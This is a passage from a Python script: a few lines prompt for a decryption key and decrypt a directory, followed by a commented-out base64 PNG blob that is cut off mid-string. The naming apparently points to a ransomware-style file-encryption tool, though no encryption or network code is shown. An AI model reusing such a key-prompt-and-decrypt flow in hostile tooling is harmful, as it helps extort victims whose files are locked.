dec_key = input()
if dec_key == 'quit':
exit()
decrypt_data(dec_key, dir_to_enc)
# else:
# data = b'iVBORw0KGgoAAAANSUhEUgAABIAAAAKICAIAAACHSRZaAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAALIISURBVHhe7f1N2qw4krbt7kZmP2JEb635D+rbWtjlpByQ0J+BcO6zEYc/jpCZTEK4MrIq/3//n4iIiIiIiFxCBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIiIiIyEV0ABMREREREbmIDmAiIiIiIiIX0QFMRERERETkIjqAiYiIiIiIXEQHMBERERERkYvoACYiIiIiInIRHcBEREREREQuogOYiIiIiIjIRXQAExERERERuYgOYCIiIiIiIhfRAUxEREREROQiOoCJiIiIiIhcRAcwERERERGRi+gAJiIiIiIichEdwERERERERC6iA5iIiIiIiMhFdAATERERERG5iA5gIiIiIiIiF9EBTERERERE5CI6gImIiIiIiFxEBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIiIiIyEV0ABMREREREbmIDmAiIiIiIiIX0QFMRERERETkIjqAiYiIiIiIXEQHMBERERERkYvoACYiIiIiInIRHcBEREREREQuogOYiIiIiIjIRXQAExERERERuYgOYCIiIiIiIhfRAUxEREREROQiOoCJiIiIiIhcRAcwERERERGRi+gAJiIiIiIichEdwERERERERC6iA5iIiIiIiMhFdAATERERERG5iA5gIiIiIiIiF9EBTERERERE5CI6gImIiIiIiFxEBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIyKT+3//7f//3f//HHyIi8hN0ABMREZlCOG4d4rKIiPwEHcBERERG4tjU6v/+7//49EG/IiLyE3QAExGRd+FY02p/QFplLvUgbxER+Qk6gImIyK/h4JJ2eFJyOj71Y1QiIvITdAATEZFH4nTyAgxYRER+gg5gIiLyMPG/qir511bT/qutQ5btJmdGLiIiz6cDmIiIPEY4imxOJlWHqyeexAzjFxGR59MBTEREHoCDSB+PA9g1hzqqICIiz6cDmIh44ZfjB9+KVLL1M8+/vLolE2ohIiLPpwOYiIzB78Rv+Z+q3CmSxloZZ56DXFCeDOUQEZHn0wFMRBrxw3AEehT5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